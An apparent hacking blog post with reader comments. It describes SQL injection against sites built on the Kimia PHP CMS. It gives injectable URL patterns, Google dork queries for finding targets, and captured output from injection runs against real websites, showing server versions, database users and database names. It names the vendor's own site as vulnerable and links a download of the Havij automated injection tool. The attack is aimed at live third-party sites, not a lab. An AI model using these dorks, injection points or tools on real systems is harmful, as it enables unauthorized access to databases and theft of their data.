An old one, but still works fine!
http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930
http://www.victim.com/image-details.php?id=[SQL]
http://www.victim.com/alert_article.php?id=[SQL]
http://www.victim.com/news-article.php?id=[SQL]
http://www.victim.com/gallery-list.php?id=[SQL]
http://www.victim.com/newsitem.php?id=[SQL]
first some googling..
google dorks:
inurl:”image-details.php?id=”
inurl:”alert_article.php?id=”
inurl:”news-article.php?id=”
inurl:”gallery-list.php?id=”
inurl:”newsitem.php?id=”
http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41
ofcourse the makers
http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72
This I won’t remove 😉 they are vulnerable themselfs 😛
Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:System User: removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
propeo_db1Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
foxanr_db1
Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
joymag_db1Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110
Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:table structure: http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html
Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html
Gostei muito desse site!
Thnxs!
hey guy you should provide a tool of different commands this is interesting but you should not provide the description of these commands. please give this description for further use of these commands. thanks
Underneath I linked the tool used (Havij)
That’s an automated sql injector.
you don’t need more..
I’m a lazy sqliér ;P
Echt leerzame dingen man, je schrijfstijl is zeer amuserend.
Blijf schrijven en posten, als je meer relevante && recente berichten zou posten zou je echt verkeer naar je site trekken. Je posts zijn awsome!
Good job and keep it up man!
Gr.